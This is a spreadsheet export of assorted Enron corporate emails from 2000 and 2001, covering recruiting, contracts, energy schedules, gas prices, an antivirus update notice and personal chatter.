&gt;    &gt; Wanted to see when you wanted to get together for a little tennis and_x000D_
&gt;    a_x000D_
&gt;    &gt; couple of beers afterwards.  Next week is pretty open for me, except_x000D_
&gt;    &gt; Wednesday.  This weekend is out because I am headed to Barton Creek_x000D_
&gt;    for_x000D_
&gt;    &gt; a little golf weekend.  Hope all is going well and I'll talk to you_x000D_
&gt;    &gt; soon._x000D_
&gt;    &gt; Ben_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    ******************************************************************_x000D_
&gt;    This email and any files transmitted with it from the ElPaso_x000D_
&gt;    Corporation are confidential and intended solely for the_x000D_
&gt;    use of the individual or entity to whom they are addressed._x000D_
&gt;    If you have received this email in error please notify the_x000D_
&gt;    sender._x000D_
&gt;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Mon, 27 Nov 2000 01:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.jones@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'npng.office@enron.com', 'et&amp;s.office@enron.com'})</t>
  </si>
  <si>
    <t>Thursday, Nov. 30, American Red Cross blood drive.</t>
  </si>
  <si>
    <t>Pump up your iron to donate your "Gift of Life."    The American Red Cross _x000D_
bloodmobile will be here Thursday, November 30.   There are a few choice _x000D_
times available plus a drawing for Lancer tickets.  Call X7532 for an _x000D_
appointment._x000D_
Elizabeth A. Jones_x000D_
Health Unit</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 09:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Results of Super Saturday</t>
  </si>
  <si>
    <t xml:space="preserve">Wow, if Haug spent more time making money than created bull.... in the _x000D_
company we would be a $100 stock._x000D_
_x000D_
On a different note, I was wondering if someone in your shop could map the _x000D_
current A&amp;A process from planning for on-campus recruitment to manager _x000D_
promotion  for the typical associate including timeline.  This process _x000D_
mapping should be very detailed to give us the greatest insight._x000D_
_x000D_
I think radical change is not the answer.  The answer lies in a combination _x000D_
of a) slight changes in process; b) increasing participation/ownership at key _x000D_
points in the process by certain business units and people; and c) a credible _x000D_
key business spokesman or spokespersons co-opting the other units where _x000D_
necessary and providing the commercial leadership and representation for the _x000D_
program internally. Overall this is a commercial program that needs to meet _x000D_
commercial objectives - the closer to the front the better._x000D_
_x000D_
The goals of any restructuring are:_x000D_
 a) eliminate the perception that the program is not receptive to the _x000D_
business units needs or any bu's perception that they lack ownership for the _x000D_
program;_x000D_
 b) increase the quality of the recruits that are brought in and retained;_x000D_
 c) ensure we have the best people in the organization recruiting, selling _x000D_
and interviewing;_x000D_
 d) ensure that we have the best commercial training program that firmly _x000D_
grounds the associate in the "Enron technology" which include skills in _x000D_
market understanding, structuring, finance, logistics and risk;_x000D_
 e) ensure the business units have the ability to identify the outstanding _x000D_
talent early and give those people the responsibility necessary to move them _x000D_
up the curve quickly (ie) quickly identify the Whalley/Lavorato's in the _x000D_
program and, on the flip side, quickly deal with clear non-performance issues;_x000D_
 f) review the effectiveness of the current PRC process as a development, _x000D_
retention and performance tool;_x000D_
 g) incorporate mid-year flexibility, internet recruiting techniques, _x000D_
non-traditional sources of talent and_x000D_
 h) increase cost effectiveness._x000D_
_x000D_
The solutions may include mandated participation by certain business units, _x000D_
people and teams, business tracks, etc._x000D_
_x000D_
I think a thorough process mapping/tracking can identify (or help me see) the _x000D_
key spots for change/modification/ownership that reach these goals with the _x000D_
least amount of wholesale change for the sake of change._x000D_
_x000D_
I think we need to get back to Jeff not next week but the following week with _x000D_
a strawman._x000D_
_x000D_
Let me know your thoughts._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/31/2000 _x000D_
05:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Charlene Jackson@ENRON_x000D_
10/31/2000 11:36 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Results of Super Saturday_x000D_
_x000D_
FYI.  I think this is inappropriate and will speak to Jeff.  Just thought you _x000D_
should know._x000D_
Charlene_x000D_
---------------------- Forwarded by Charlene Jackson/Corp/Enron on 11/01/2000 _x000D_
11:34 AM ---------------------------_x000D_
_x000D_
_x000D_
Becky Bruce_x000D_
10/30/2000 10:55 PM_x000D_
To: Charlene Jackson/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Results of Super Saturday_x000D_
_x000D_
FYI._x000D_
Becky_x000D_
---------------------- Forwarded by Becky Bruce/NA/Enron on 10/30/2000 10:48 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
David Haug@ENRON_DEVELOPMENT_x000D_
10/30/2000 06:03 PM_x000D_
To: Shawn Cumberland/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ben F _x000D_
Glisan/HOU/ECT@ECT, Hal Elrod/Corp/Enron@Enron, Emilio _x000D_
Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Brian Kerrigan/HOU/ECT@ECT, V _x000D_
Charles Weldon/HOU/ECT@ECT, Kyle Kettler/HOU/ECT@ECT, Craig Childers@ECT, _x000D_
Jeff Bartlett/HOU/ECT@ECT, Paul J Broderick/HOU/ECT@ECT, Gwynn Gorsuch@ENRON, _x000D_
John House/HOU/ECT@ECT, Stewart Seeligson@ECT, Ray _x000D_
McPhail/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Becky Bruce@ENRON, Mary Alison Bailey/HOU/ECT@ECT _x000D_
_x000D_
Subject: Results of Super Saturday_x000D_
_x000D_
Here is how the UT candidates fared at Super Saturday. 9 of 17 got offers (   _x000D_
others are coming to future Super Saturdays). This result is obviously _x000D_
disappointing - - -  65% of  the 55 students from all schools got offers.   I _x000D_
will be getting more info on why the other 8 were not well received.  If _x000D_
anyone thinks a manifest injustice or mistake has occurred let me know.  _x000D_
Ditto if you think anyone's prior background makes them a candidate for a _x000D_
direct hire - - -i.e., not in the associate program._x000D_
     On the "yeses", please let me know who you would like to follow up on _x000D_
and encourage to accept.  We will try to do this by volunteers: more than one _x000D_
per student is OK, and each of you should select one or two. When you talk to _x000D_
them, get their feedback on Super Saturday and the whole process. If anyone _x000D_
wants to call any of the "no's", to commisserate, that's OK too. - - -DLH_x000D_
---------------------- Forwarded by David Haug/ENRON_DEVELOPMENT on _x000D_
10/30/2000 06:12 PM ---------------------------_x000D_
From: Mary Alison Bailey@ECT on 10/30/2000 02:58 PM_x000D_
To: David Haug/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Linda Fuqua/NA/Enron@Enron _x000D_
_x000D_
Subject: PRTD - Results of Super Saturday_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'becky.spencer@enron.com', 'tana.jones@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'kaye.ellis@enron.com', 'jason.peters@enron.com', 'susan.bailey@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'suzanne.adams@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'mary.cook@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Vacation Reminder</t>
  </si>
  <si>
    <t>_x000D_
I will be out next week.  Esmeralda Gonzalez is my new assistant at 57621 if _x000D_
you need to reach me for any emergencies.  _x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 00:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.miller@enron.com', 'kenneth.lay@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Vanguard Venture Partners Energy Discussion</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dan Eilers of Vanguard Venture Partners contacted me last week to see if _x000D_
Enron would be interested in a high level discussion of the changes occurring _x000D_
in electricity generation and management technologies.  Vanguard is an early _x000D_
stage VC fund that helped create Ciena and Network Appliance.  Dan is a new _x000D_
partner and is looking at the energy market as a new focus for Vanguard.  _x000D_
_x000D_
He would like to have a brainstorming session with an eye on creating a _x000D_
cooperative relationship between Vanguard and Enron for the evaluation and _x000D_
development of new companies in the energy arena._x000D_
_x000D_
I would appreciate it if you could respond with your interest level so I _x000D_
could arrange a time that is convenient for each of you to participate._x000D_
_x000D_
Thanks,_x000D_
Mark_x000D_
_x000D_
Mark Lay_x000D_
Enron Investment Partners_x000D_
333 Clay St., suite 3800_x000D_
Houston, TX 77002_x000D_
p 713-853-7408_x000D_
f 713-345-7670_x000D_
----- Forwarded by Mark Lay/HOU/ECT on 11/10/2000 07:52 AM -----_x000D_
_x000D_
	Dan Eilers &lt;Dan@vanguardventures.com&gt;_x000D_
	11/09/2000 08:44 PM_x000D_
		 _x000D_
		 To: "'mark.lay@enron.com'" &lt;mark.lay@enron.com&gt;_x000D_
		 cc: Bob Ulrich &lt;bob@vanguardventures.com&gt;_x000D_
		 Subject: Energy investing...brainstorming and perspective sharing between _x000D_
Vanguard Ventures and Enron..._x000D_
_x000D_
Many thanks for meeting with Bob and I last week._x000D_
How ironic to find you working with one of my _x000D_
graduate school classmates, Gene Humphrey._x000D_
_x000D_
As we discussed, Vanguard is interested in exploring_x000D_
what kinds of opportunities may exist for venture _x000D_
investment in the energy arena.  We think that_x000D_
the ultimate "internet (and everything) infrastructure" play is about clean,_x000D_
always on, electrical power.  While we are not experts in the area,_x000D_
and are not yet certain it will be a productive area for venture_x000D_
capital investment of the type Vanguard does, we feel _x000D_
that there is a sufficient market need in multiple segments that _x000D_
there MAY be such an investment opportunity which it_x000D_
would make sense for us to pursue as an investment_x000D_
focus area.  This could have value for Enron should_x000D_
we determine investment areas which are symbiotic_x000D_
with Enron and which we could collaborate on, as we_x000D_
help catalyze/create/fund exciting new companies._x000D_
_x000D_
As we discussed we would love to participate in a brainstorming and _x000D_
perspective setting session with visionary and strategic Enron executives_x000D_
who_x000D_
have domain knowledge and an interest. Our potential interest areas span _x000D_
from generation (alternatives, distributed, and conventional) _x000D_
to transmission to distribution to storage...fixed and mobile.  _x000D_
We appreciate your offer to pull together an Enron group for such _x000D_
a brainstorming...and I would be quite happy to fly down to _x000D_
Houston again in order to engage in such a session._x000D_
_x000D_
As always we appreciate your interest in Vanguard._x000D_
_x000D_
Best,_x000D_
_x000D_
_x000D_
Daniel Eilers_x000D_
General Partner _x000D_
Vanguard Ventures _x000D_
525 University Avenue, Suite 600_x000D_
Palo Alto, California  94301_x000D_
Phone:  (650) 321-2900 voice; (650) 321-2902 fax_x000D_
Mobile:  (415) 516-6360_x000D_
Email:   dan@vanguardventures.com_x000D_
http://www.vanguardventures.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 08:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Game @ 7:00</t>
  </si>
  <si>
    <t xml:space="preserve">I think that despite all of the ballyhoo about Simms ( and I know you hate _x000D_
this), Applewhite should play.  I think if Applewhite plays and we have a _x000D_
decent running game, we can blow them out.  Our defense is good enough to _x000D_
shut pretty much anyone down._x000D_
_x000D_
When are you going up and what are ya'll doing up there?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Luis Mena@ENRON_x000D_
10/02/2000 03:18 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Game @ 7:00  _x000D_
_x000D_
I'm there.  What do you think about OU??  I think it will be a tough game but _x000D_
I sure am glad (make that hope) that Hodges doesn't see the field too much._x000D_
_x000D_
Luis_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Eric Bass @ ECT                           10/02/2000 10:33 AM_x000D_
	_x000D_
_x000D_
To: Matthew Lenhart/HOU/ECT@ECT, Timothy Blanchard/HOU/EES@EES, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Kenneth Shulklapper/HOU/ECT@ECT, Nick _x000D_
Hiemstra/HOU/ECT@ECT, Luis Mena/NA/Enron@Enron, Amir Ahanchian/Enron _x000D_
Communications@Enron Communications, Brian Hoskins/Enron Communications@Enron _x000D_
Communications_x000D_
cc: acahanchian@zdnetonebox.com _x000D_
_x000D_
Subject: Game @ 7:00_x000D_
_x000D_
Our game is at 7:00 this week.  We play the other Enron team.  Please let me _x000D_
know whether or not you will attend._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GE Breakout Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Re:  ESA.  Getting close._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/11/2000 08:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Brett R Wiggs_x000D_
12/10/2000 06:32 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: John R Ayres/NA/Enron@Enron _x000D_
_x000D_
Subject: GE Breakout Contract_x000D_
_x000D_
Kay:_x000D_
_x000D_
Lee Johnson and John Ayres are going to meet Monday morning at 8:30 to go _x000D_
through all the technical information in the contract to confirm everything.  _x000D_
They should get back to you very quickly with any changes.  I think the _x000D_
primary thing they are discussing is using a combined guarantee rather than _x000D_
single unit._x000D_
_x000D_
Thanks,_x000D_
Brett_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 02:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'allatham@realtor.com', 'debbielatham@realtor.com'})</t>
  </si>
  <si>
    <t>how much would i make working for a real estate developer?</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 22:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/21/01; HourAhead hour: 6;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/21/01; HourAhead hour: 6;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2106.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/21/01_x000D_
  UNIT_ID: HARBGN_7_UNITS_x000D_
_x000D_
_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/21/01_x000D_
  TIE_POINT: SLVRPK_7_SPP_x000D_
  INTERCHG_ID: EPMI_CISO_ERNIE_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 6 / Preferred: -700.00 / Final: -699.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/21/01_x000D_
  TRADING_SC: WESC_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred:   0.42 / Final:   0.39)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/21/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 04:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'tom.briggs@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'cynthia.sandherr@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'dwatkiss@bracepatt.com', 'joe.hartsoe@enron.com', 'donna.fulton@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>PROPOSED TALKING POINTS FOR DISCUSSION AT 1PM HOUSTON CALL</t>
  </si>
  <si>
    <t xml:space="preserve">Here are some thoughts._x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tom.may@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
---------------------- Forwarded by Tom May/Corp/Enron on 05/11/2001 03:45 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Thane Twiggs@ENRON_DEVELOPMENT_x000D_
05/10/2001 08:24 PM_x000D_
To: Smith L Day/HOU/ECT@ECT, Doug Gilbert-Smith/Corp/Enron@ENRON_x000D_
cc: Ron McNamara/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, Tom _x000D_
May/Corp/Enron@Enron _x000D_
_x000D_
Subject: _x000D_
_x000D_
Today the Protocol Review Subcommittee passed unanimously a revision request _x000D_
that will allow ercot to grant "provisional authorization" to QSE to provide _x000D_
ancillary services for a period of 90 days while any deficiencies in the _x000D_
certification can be corrected.  The request will be sent to the TAC where it _x000D_
will have an e-mail vote and I would not anticipate any opposition. _x000D_
_x000D_
To receive the "provisional authorization" the QSE needs to have performed an _x000D_
Ancillary Services qualification test in good faith but failed to qualify due _x000D_
to problems that in the opinion of ERCOT, are noncritical for providing one _x000D_
or more ancillary services.  My understanding is that Frontera has not had _x000D_
the primary test.  According to John Adams at ERCOT four have been scheduled _x000D_
and subsequently cancelled.  It will be critical to schedule and complete the _x000D_
test to be considered for the "provisional authorization".  _x000D_
_x000D_
I spoke with John Adams regarding staffing to help perform the qualification _x000D_
tests and he said that they would be able to do the certification tests at _x000D_
about any time without any major scheduling delays.  The only time when they _x000D_
would not be able to do the tests would be when ESCA will take control of the _x000D_
systems to perform cut-over operations. _x000D_
_x000D_
Thane Thomas Twiggs_x000D_
Enron Corp_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
_x000D_
713-853-3199 Voice_x000D_
713-408-4463 Mobile_x000D_
713-646-8272 Fax_x000D_
877-968-8967 Digital Pager or 8779688967@skytel.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 14:11:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'troy.denetsosie@enron.com'})</t>
  </si>
  <si>
    <t>RE: Transport 101 @ 4pm</t>
  </si>
  <si>
    <t>Sorry Troy.  I guess today is a bad day.  Probably after the 1st._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Denetsosie, Troy  _x000D_
Sent:	Thursday, October 25, 2001 1:02 PM_x000D_
To:	Germany, Chris_x000D_
Subject:	Transport 101 @ 4pm_x000D_
_x000D_
Chris,_x000D_
_x000D_
If you have time today, can we go over the basics?  Also, can you get a room or shall I get something on 35?</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 06:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.schwertner@enron.com'})</t>
  </si>
  <si>
    <t>Re: Question</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, close will take priority.  That is a free time job.  Thanks for the _x000D_
update._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Dana Davis @ ECT                           02/06/2001 11:49 AM_x000D_
	_x000D_
_x000D_
To: Brian Schwertner/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Question_x000D_
_x000D_
Is it OK that I let entries take priority over those documents that you _x000D_
wanted me to hole punch and place in binders for you?  I thought I could do _x000D_
it for sure today and I still might be able too but I want to make sure that _x000D_
I don't fall behind on the entries.  Is that OK?  Oh yeah, Brad and Lisa Kang _x000D_
had me working on projects for them Friday and Monday._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 03:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fpam_@hotmail.com'})</t>
  </si>
  <si>
    <t>got it</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 09:05:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rd_cates@yahoo.com'})</t>
  </si>
  <si>
    <t>RE: Retirement in a Trailer Park</t>
  </si>
  <si>
    <t>this is cute,  things like this help during difficult times_x000D_
_x000D_
-----Original Message-----_x000D_
From: Rick Cates [mailto:rd_cates@yahoo.com]_x000D_
Sent: Monday, December 03, 2001 11:03 AM_x000D_
To: Brickman, Ronnie; Guy Bruner; Campbell, Larry; Chris Gerald; raymond_x000D_
hanover; Haug, Steve; Ben Howard; Bill Jones; Loveless, Rick; Nichols,_x000D_
Leo; John Rose_x000D_
Subject: Fwd: Retirement in a Trailer Park_x000D_
_x000D_
_x000D_
&gt; RETIREMENT IN A TRAILER  PARK THRU THE EYES OF A_x000D_
&gt; CHILD This is just too_x000D_
&gt; cute! _x000D_
&gt; _x000D_
&gt; After a spring  break, a teacher asked her young_x000D_
&gt; pupils how they  spent_x000D_
&gt; the holidays. One  child wrote the following: _x000D_
&gt; _x000D_
&gt; "We always used to spend the holidays with Grandma_x000D_
&gt; and Grandpa. They used_x000D_
&gt;  to live here in a big brick house, but Grandpa got_x000D_
&gt; retarded and they_x000D_
&gt; moved  to Arizona.    _x000D_
&gt; _x000D_
&gt; Now they live in a  place with a lot of other_x000D_
&gt; retarded  people.  They_x000D_
&gt; live in a tin box  and have rocks painted green to_x000D_
&gt; look like grass.  They_x000D_
&gt; ride around on big tricycles and wear name tags_x000D_
&gt; because they don't  know_x000D_
&gt; who they are anymore.  They go to a building called_x000D_
&gt; a wrecked center, but_x000D_
&gt; they must have got it  fixed, because it is all_x000D_
&gt; right now. They play_x000D_
&gt; games and do exercises  there, but they don't do_x000D_
&gt; them very well. There is_x000D_
&gt; a swimming pool too,  but  they all jump up and down_x000D_
&gt; in it with their_x000D_
&gt; hats on. I guess they don't know how to swim.   _x000D_
&gt; _x000D_
&gt; At their gate, there is a doll house with a little_x000D_
&gt; old man sitting in it._x000D_
&gt;  He watches all day so nobody can escape. Sometimes_x000D_
&gt; they sneak out.  Then_x000D_
&gt;  they go cruising in their golf carts. _x000D_
&gt; _x000D_
&gt; My Grandma used to bake cookies and stuff, but I_x000D_
&gt; guess she forgot how. _x000D_
&gt; Nobody there cooks, they just eat out. And they eat_x000D_
&gt; the same thing every _x000D_
&gt; night, "Early Birds. "  Some of the people can't get_x000D_
&gt; past the man in the _x000D_
&gt; doll house to go out. So the ones who do get out_x000D_
&gt; bring food back to the _x000D_
&gt; wrecked center and call it pot luck. _x000D_
&gt; _x000D_
&gt; My Grandma says Grandpa's worked all his life to_x000D_
&gt; earn his retardment and _x000D_
&gt; says I should work hard so I  can be retarded_x000D_
&gt; someday too. When I earn my_x000D_
&gt;  retardment I want to be  the man in the doll house._x000D_
&gt; Then I will let_x000D_
&gt; people  out so they can visit their grandchildren. "_x000D_
&gt; _x000D_
&gt; _x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Buy the perfect holiday gifts at Yahoo! Shopping._x000D_
http://shopping.yahoo.com</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 06:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ACTION REQUESTED- Virus Scan Update</t>
  </si>
  <si>
    <t>Everyone, _x000D_
_x000D_
Once again, there are a number of new viruses that have been released on the internet that are causing us to do frequent updates to our virus protection software.  _x000D_
_x000D_
We have an automated process to update our workstations with the latest virus protection updates.   However, there may be some machines that didn't get the update.  In order to prevent these viruses from infecting your machine, please assist by doing one of the following tasks. _x000D_
_x000D_
1.  Logout of the network and log back in or_x000D_
2.  Click on START&gt;PROGRAMS&gt;ACCESSORIES&gt;Norton AntiVirus Corporate Edition and then click the Live Update button.  This will pop up a screen where you will have to click the "Next" button and then a "Finish" button.   (If you are an EES user, you will only be able to use option #1 as you use a different virus protection product.)     _x000D_
_x000D_
The proper version of the update pattern you need is:   (9/24/2001, version 30924p)_x000D_
_x000D_
If you have questions or concerns, please direct them to your Resolution Center._x000D_
_x000D_
Enron Global Technology</t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 04:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the latest model.  Let talk about it ASAP.  _x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 15:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily-Blessings 11/18/00</t>
  </si>
  <si>
    <t>Daily Blessing_x000D_
http://www.daily-blessings.com/bless143.htm_x000D_
_x000D_
Jan_x000D_
http://www.daily-blessings.com/humor52.htm_x000D_
_x000D_
check out thanksgiving pages...send them on to friends and family to let them _x000D_
know you are thankful for them!_x000D_
_x000D_
http://www.debsfunpages.com/thanksgiving.htm_x000D_
_x000D_
win a digital camera, $4500.00 or MORE_x000D_
http://www.daily-blessings.com/4500.htm_x000D_
_x000D_
FORGET PC PHONE. GET REAL LONG DISTANCE AT NO COST bigredwire is the first _x000D_
and only company to offer REAL long distance at no cost_x000D_
Switch your long distance to bigredwire and get REAL long distance at zero _x000D_
cost to you. Up to 100 complimentary minutes everyday when you zap your _x000D_
online bill. If you don't zap, pay only 5 cents a minute without fees. Switch _x000D_
now!_x000D_
find out how at http://www.daily-blessings.com/cjbigredwire.htm_x000D_
_x000D_
Mr Inkman-for all your ink needs_x000D_
http://www.daily-blessings.com/inkman.htm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t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 10:00:04 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">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Wednesday, September 26, 20=_x000D_
01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Tuesday, September 25, 20=_x000D_
01)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20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20_x000D_
_x000D_
Region     Hub=09High=09Low=09Wtd Avg Index=09Change ($)=09Vol (mmBtu)=09Hu=_x000D_
b Name=09_x000D_
 LOUISIANA =09=09=09=09=09=09=09_x000D_
    ANR SE=09          $1.9225=09          $1.8900=09          $1.9073=09- =_x000D_
   .0264=09         157,000=09American Natural Resources Pipeline Co. - SE =_x000D_
 Transmission Pool=09_x000D_
    Columbia Onshore=09          $1.9650=09          $1.9000=09          $1=_x000D_
.9188=09-    .0493=09         282,900=09Columbia Gulf Transmission Co. - On=_x000D_
shore Pool =09_x000D_
    Henry Hub=09          $1.9800=09          $1.9200=09          $1.9470=_x000D_
=09-    .0304=09         639,000=09Henry Hub tailgate - Louisiana =09_x000D_
    NGPL LA=09          $1.9250=09          $1.8800=09          $1.9156=09-=_x000D_
    .0430=09         197,500=09Natural Gas Pipeline Co. of America, Louisia=_x000D_
na Pool =09_x000D_
    Tenn 500L=09          $2.0300=09          $1.9650=09          $2.0020=_x000D_
=09-    .0172=09         197,400=09Tennessee Gas Pipeline Co.-Zone L, 500 L=_x000D_
eg Pool =09_x000D_
    Tenn 800L=09          $1.8700=09          $1.8400=09          $1.8610=_x000D_
=09-    .0016=09         240,400=09Tennessee Gas Pipeline Co.-Zone L, 800 L=_x000D_
eg Pool =09_x000D_
    TETCO ELA=09          $2.0000=09          $1.9400=09          $1.9806=_x000D_
=09-    .0365=09         286,200=09Texas Eastern - East LA =09_x000D_
    TETCO WLA=09          $1.9900=09          $1.9000=09          $1.9563=_x000D_
=09-    .0262=09         155,000=09Texas Eastern - West LA =09_x000D_
    Transco 65=09          $2.0850=09          $2.0000=09          $2.0648=_x000D_
=09+    .0061=09         203,500=09Transco - Station 65 =09_x000D_
    Trunkline ELA=09          $1.8800=09          $1.8450=09          $1.86=_x000D_
50=09-    .0153=09          90,900=09Trunkline Gas Company - East Louisiana=_x000D_
 Pool =09_x000D_
    TxGas SL=09          $1.9550=09          $1.9000=09          $1.9357=09=_x000D_
-    .0324=09         195,600=09Texas Gas Transmission Corp.-Zone SL FT Poo=_x000D_
l =09_x000D_
 MIDCONTINENT =09=09=09=09=09=09=09_x000D_
    MichCon, citygate=09          $2.1550=09          $2.1000=09          $=_x000D_
2.1328=09+    .0145=09          74,800=09Michigan Consolidated =09_x000D_
    NGPL Midcont=09          $1.8400=09          $1.8000=09          $1.820=_x000D_
0=09-    .0395=09         112,400=09Natural Gas Pipeline Co. of America, Mi=_x000D_
d-Continent Pool =09_x000D_
    NGPL Nicor, citygate=09          $1.9850=09          $1.9500=09        =_x000D_
  $1.9660=09-    .0442=09         769,300=09Natural Gas Pipeline Co. of Ame=_x000D_
rica, Nicor Citygate=09_x000D_
    NGPL NIPSCO, citygate=09          $1.9850=09          $1.9650=09       =_x000D_
   $1.9694=09-    .0436=09          92,600=09Natural Gas Pipeline Co. of Am=_x000D_
erica, Nipsco Citygate=09_x000D_
    NNG Demarcation=09          $1.9175=09          $1.8500=09          $1.=_x000D_
8920=09-    .0614=09         323,600=09Northern Natural Gas, Demarcation Po=_x000D_
ol =09_x000D_
 NORTHEAST =09=09=09=09=09=09=09_x000D_
    Columbia TCO=09          $2.2725=09          $2.2050=09          $2.227=_x000D_
8=09-    .0015=09         394,900=09Columbia Gas Co. - TCO Pool =09_x000D_
    Dominion So.Point=09          $2.2650=09          $2.1000=09          $=_x000D_
2.2321=09-    .0016=09         354,500=09Dominion - South Point =09_x000D_
    TETCO M3=09          $2.3400=09          $2.2600=09          $2.2996=09=_x000D_
